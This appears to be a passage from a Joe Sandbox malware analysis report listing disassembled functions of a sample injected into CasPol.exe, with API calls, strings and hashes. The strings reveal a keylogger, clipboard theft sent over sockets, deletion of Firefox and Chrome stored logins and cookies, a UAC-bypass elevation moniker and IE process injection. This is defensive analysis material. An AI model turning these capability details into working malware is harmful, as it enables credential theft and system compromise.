                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$CloseFile$FirstNext
                                                                                                                    • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                    • API String ID: 1164774033-3681987949
                                                                                                                    • Opcode ID: 4a1a03e4cef8889718d129957eae971e9984c7d64678b1f28f8febcff1977373
                                                                                                                    • Instruction ID: 6ff196721abdd8e0f3db8d3f3c96df629808f1f9148939b99990ee587e15bfec
                                                                                                                    • Opcode Fuzzy Hash: 4a1a03e4cef8889718d129957eae971e9984c7d64678b1f28f8febcff1977373
                                                                                                                    • Instruction Fuzzy Hash: 31512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                                                    APIs
                                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$Close$File$FirstNext
                                                                                                                    • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                    • API String ID: 3527384056-432212279
                                                                                                                    • Opcode ID: 538ed0c0026e38c1a475ad278a1ab93bf4d219c7583b6428fe2cd05492cb3def
                                                                                                                    • Instruction ID: 007be0ece90fca0e9f39ea1f272cf2b8da877aadfcc1370f70eac597690c30d9
                                                                                                                    • Opcode Fuzzy Hash: 538ed0c0026e38c1a475ad278a1ab93bf4d219c7583b6428fe2cd05492cb3def
                                                                                                                    • Instruction Fuzzy Hash: A7414B319042196ACB14F7A1EC569EE7768EF21318F50017FF801B31E2EF399A45CA9E
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                                                      • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                      • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                      • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                                    • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                                                    • API String ID: 726551946-3025026198
                                                                                                                    • Opcode ID: edf06e4f099b05c1f558ccb755c035a16f9f3693c1ac1a0985226843a19e3498
                                                                                                                    • Instruction ID: ff5f769c9d2eb9d60ee5c92f3007ac3329fe223f24fa54890becbfeace6a8f7f
                                                                                                                    • Opcode Fuzzy Hash: edf06e4f099b05c1f558ccb755c035a16f9f3693c1ac1a0985226843a19e3498
                                                                                                                    • Instruction Fuzzy Hash: 647182311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A919CA9A
                                                                                                                    APIs
                                                                                                                    • OpenClipboard.USER32 ref: 004159C7
                                                                                                                    • EmptyClipboard.USER32 ref: 004159D5
                                                                                                                    • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                                                    • CloseClipboard.USER32 ref: 00415A5A
                                                                                                                    • OpenClipboard.USER32 ref: 00415A61
                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                                    • CloseClipboard.USER32 ref: 00415A89
                                                                                                                      • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3520204547-0
                                                                                                                    • Opcode ID: 48a737ec427946de25fb1777b3112fdee2b2cad8e203a9c0251e16d68b009561
                                                                                                                    • Instruction ID: 65deba99f03779ab530566add8b8501f772d12743f07501a5a0e0bdfe921cf26
                                                                                                                    • Opcode Fuzzy Hash: 48a737ec427946de25fb1777b3112fdee2b2cad8e203a9c0251e16d68b009561
                                                                                                                    • Instruction Fuzzy Hash: 232183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 0$1$2$3$4$5$6$7
                                                                                                                    • API String ID: 0-3177665633
                                                                                                                    • Opcode ID: 71697206334f9f2bca7fe39ab7c56b0ab69560120ed9af9d79647fc5a993506d
                                                                                                                    • Instruction ID: 8a7243103da74f60d5bbefacb9012cb64624b509857c51ebf6f1776beea37390
                                                                                                                    • Opcode Fuzzy Hash: 71697206334f9f2bca7fe39ab7c56b0ab69560120ed9af9d79647fc5a993506d
                                                                                                                    • Instruction Fuzzy Hash: EE61B470508301AEDB00EF21C862FEE77E4AF95754F40485EF591672E2DB78AA48C797
                                                                                                                    APIs
                                                                                                                    • GetForegroundWindow.USER32 ref: 00409B3F
                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                    • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                    • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                    • GetKeyboardState.USER32(?), ref: 00409B67
                                                                                                                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                                    • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                    • String ID: X[G
                                                                                                                    • API String ID: 1888522110-739899062
                                                                                                                    • Opcode ID: d91d0540f812f4871974057b5933cd142222a9cf3d101d705a5052a8f4d3ab48
                                                                                                                    • Instruction ID: b3d75429b008435a5e1dd269aa2dc422b6d7dab2ccd5499d38c457950c038251
                                                                                                                    • Opcode Fuzzy Hash: d91d0540f812f4871974057b5933cd142222a9cf3d101d705a5052a8f4d3ab48
                                                                                                                    • Instruction Fuzzy Hash: 7C318F72544308AFE700DF90EC45FDBBBECEB48715F00083ABA45961A1D7B5E948DBA6
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00406788
                                                                                                                    • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Object_wcslen
                                                                                                                    • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                    • API String ID: 240030777-3166923314
                                                                                                                    • Opcode ID: fb4b37c01a82ea3e6f4d6ea97501aa73dd573a9fa8d004a292a27325ecfbba87
                                                                                                                    • Instruction ID: 8131e8b3f96e11b5c9c7103c6ecb9350ac77814929071503a065d606a7b617cc
                                                                                                                    • Opcode Fuzzy Hash: fb4b37c01a82ea3e6f4d6ea97501aa73dd573a9fa8d004a292a27325ecfbba87
                                                                                                                    • Instruction Fuzzy Hash: A11170B2901118AEDB10FAA58849A9EB7BCDB48714F55007BE905F3281E77C9A148A7D
                                                                                                                    APIs
                                                                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00474918), ref: 004198E8
                                                                                                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419937
                                                                                                                    • GetLastError.KERNEL32 ref: 00419945
                                                                                                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041997D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3587775597-0
                                                                                                                    • Opcode ID: 9221a97e37ce63e1dfc2a590e15a2d383158a23c63d16956968e5530d48b3d55
                                                                                                                    • Instruction ID: 19b9a1677c56063b65225fc9a0f34bb07ffc83518ef4baa2b379b487d5559ddd
                                                                                                                    • Opcode Fuzzy Hash: 9221a97e37ce63e1dfc2a590e15a2d383158a23c63d16956968e5530d48b3d55
                                                                                                                    • Instruction Fuzzy Hash: 84813F711083049BC714FB21DC959AFB7A8BF94718F50493EF582521E2EF78EA05CB9A
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
                                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B539
                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B546
                                                                                                                      • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C
                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
                                                                                                                    • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B580
                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B593
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2341273852-0
                                                                                                                    • Opcode ID: 0297631c5ee8ecb1d1a4c9aeac50dc6e63fd93f3a2d20230b54752594d88c721
                                                                                                                    • Instruction ID: 0b65015344b940e71c8db0708908b2546b6e9c6134e65c3d42cb3d4753665141
                                                                                                                    • Opcode Fuzzy Hash: 0297631c5ee8ecb1d1a4c9aeac50dc6e63fd93f3a2d20230b54752594d88c721
                                                                                                                    • Instruction Fuzzy Hash: 4D31937180921C6ACB20D771AC49FDA77BCAF08304F4405EBF505D3182EB799AC4CA69
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                                                    • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                                                    • GetLastError.KERNEL32 ref: 00409A1B
                                                                                                                      • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                                                                    • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                                                    • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                                                    Strings
                                                                                                                    • Keylogger initialization failure: error , xrefs: 00409A32
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                    • String ID: Keylogger initialization failure: error
                                                                                                                    • API String ID: 3219506041-952744263
                                                                                                                    • Opcode ID: 8a150b850c40751c4d3c51e8045edfae491f6e30bd8adda2b22654e8f725d179
                                                                                                                    • Instruction ID: 51093fa3456b5fa5e68b97b38f4420b838fb12217e42543f2b1c539fb4fc9beb
                                                                                                                    • Opcode Fuzzy Hash: 8a150b850c40751c4d3c51e8045edfae491f6e30bd8adda2b22654e8f725d179
                                                                                                                    • Instruction Fuzzy Hash: 281194716043015FC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAA
                                                                                                                    APIs
                                                                                                                    • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041301A
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00413026
                                                                                                                      • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                    • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                    • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                    • API String ID: 2127411465-314212984
                                                                                                                    • Opcode ID: 62864654b4172c23c36bd298797ba6ffba39aa4c150a1d12abcd8472de587f0f
                                                                                                                    • Instruction ID: 77d0e0f665ec2cae06f71cdba8331079b705a8b2343c1238c9795aa136ea70b2
                                                                                                                    • Opcode Fuzzy Hash: 62864654b4172c23c36bd298797ba6ffba39aa4c150a1d12abcd8472de587f0f
                                                                                                                    • Instruction Fuzzy Hash: 0AB1B571A043006BC614BA75CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                                                                    APIs
                                                                                                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                                                    • GetLastError.KERNEL32 ref: 0040B261
                                                                                                                    Strings
                                                                                                                    • UserProfile, xrefs: 0040B227
                                                                                                                    • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                                                    • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                                                    • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteErrorFileLast
                                                                                                                    • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                    • API String ID: 2018770650-1062637481
                                                                                                                    • Opcode ID: 7ecc4e94247dd75e85f2eb484a84449b95e5f3b3bb19d81e9f11951ce067ef14
                                                                                                                    • Instruction ID: b4925b9b145212f78872d6bf605c5cdf000d45b1535ad2fa459343da0bf9ff5a
                                                                                                                    • Opcode Fuzzy Hash: 7ecc4e94247dd75e85f2eb484a84449b95e5f3b3bb19d81e9f11951ce067ef14
                                                                                                                    • Instruction Fuzzy Hash: 8C01623168410597CA0577B5ED6F8AE3624E921718F50017FF802731E6FF7A9A0586DE
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                    • GetLastError.KERNEL32 ref: 00416B02
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                    • API String ID: 3534403312-3733053543
                                                                                                                    • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                    • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                                                    • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                    • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 004089AE
                                                                                                                      • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                                      • Part of subcall function 0040428C: connect.WS2_32(?,00D8BF50,00000010), ref: 004042A5
                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                                                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                                                      • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(000002CC,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                      • Part of subcall function 00404468: SetEvent.KERNEL32(000002CC,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                      • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                                      • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                                      • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                                                      • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4043647387-0
                                                                                                                    • Opcode ID: 7a7ef1853f77354544986e9b201a4428db274b7501ba5dc87aab48397c840560
                                                                                                                    • Instruction ID: 093ddd6807f9b365337d5cb0cb3505b04edbc5c9b0fee964739ae84c01535933
                                                                                                                    • Opcode Fuzzy Hash: 7a7ef1853f77354544986e9b201a4428db274b7501ba5dc87aab48397c840560
                                                                                                                    • Instruction Fuzzy Hash: 50A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF506B71D2EF385E498B98
                                                                                                                    APIs
                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041982A,00000000,00000000), ref: 00419BDD
                                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041982A,00000000,00000000), ref: 00419BF2
                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419BFF
                                                                                                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041982A,00000000,00000000), ref: 00419C0A
                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1C
                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 276877138-0
                                                                                                                    • Opcode ID: d0335b8e3d7468fec46ab29645fca41a8d5a3df9c65c6e17278e64ff330a848c
                                                                                                                    • Instruction ID: 029754fb73528063a62336f1848e5bb122dc48601db67947cc2268dfcf3d9ab0
                                                                                                                    • Opcode Fuzzy Hash: d0335b8e3d7468fec46ab29645fca41a8d5a3df9c65c6e17278e64ff330a848c
                                                                                                                    • Instruction Fuzzy Hash: 2EF089755053146FD2115B31FC88DBF2AECEF85BA6B00043AF54193191DB68CD4595F5
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?), ref: 00418ECF
                                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F9B
                                                                                                                      • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
